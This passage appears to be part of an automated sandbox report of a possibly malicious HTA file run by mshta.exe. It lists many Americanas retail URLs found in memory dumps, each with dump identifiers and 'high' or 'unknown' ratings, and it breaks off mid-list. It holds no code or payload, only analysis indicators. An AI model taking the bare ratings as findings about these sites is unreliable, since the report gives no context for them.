                                    https://www.americanas.com.br/busca/ar-condicionado-portatilmshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627081042.000000000975A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725760974.0000000009762000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751601665.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627122723.000000000975B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.pngmshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A87C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772100906.00000000093BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750307387.000000000AA36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748068401.000000000A87C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774035249.000000000A87C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775048754.000000000AA39000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.americanas.com.br/categoria/papelaria?chave=dk_hm_at_papelariamshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.americanasadvertising.com?utm_source=site_marcas_americanas&amp;utm_medium=botao_footer&mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                            unknown
                                            https://www.americanas.com.br/produto/7503637854?chave=dk_hm_bn_4_8_oferta-o2omshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                              high
                                              https://www.americanas.com.br/categoria/informatica/tabletmshta.exe, 00000000.00000003.2727024029.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676098598.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776512288.000000000C0ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.americanas.com.br/categoria/eletrodomesticos/forno-de-embutir?chave=pfm_hm_tt_1_0_forno-mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717207102.0000000009A5F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695409967.0000000009A5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                  high
                                                  https://ri.americanas.com/governanca-corporativa/estatuto-codigos-e-politicasmshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766365966.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                    unknown
                                                    https://www.americanas.com.br/categoria/enfeites-de-natal/arvores-de-natalIemshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774395490.000000000A91B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.americanas.com.br/categoria/moveis/cama?chave=pfm_hm_tt_1_0_camamshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.000000000935D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743317216.000000000C09F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726955229.000000000C09B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727148454.000000000C09C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669117708.000000000C09A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://canaldedenuncias.com.br/universoamericanas/mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743405229.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777098061.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://www.americanas.com.br/busca/xbox-series-smshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627081042.000000000975A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725760974.0000000009762000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627122723.000000000975B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                            high
                                                            https://www.americanas.com.br/hotsite/servicos/home?chave=dk_hm_branding_servicosmshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670092360.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668523630.0000000009297000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                              high
                                                              https://empresas.americanas.com.br/?chave=brd_hm_mn_0_bottom_bndesmshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772341116.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670251868.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668835006.0000000009409000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://cliente.americanas.com.br/minha-contamshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2543401774.0000000006527000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542970365.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                  unknown
                                                                  https://www.americanas.com.br/categoria/moveis?chave=dk_hm_at_moveismshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713822751.0000000009A59000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770422568.000000000929A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2708803220.0000000009A58000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A57000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://images-americanas.b2w.io/spacey/acom/2024/12/09/sec-brinquedos_esporte-e-lazer-destaque-mob-mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2659343990.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749376863.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745043189.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744380912.000000000336C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766109182.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750683255.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                      high
                                                                      https://www.americanas.com.br/categoria/papelaria?chave=dk_hm_at_papelaria-fmshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cliente.americanas.com.br/minhamshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://www.americanas.com.br/categoria/eletrodomesticos/coifa-e-depuradormshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 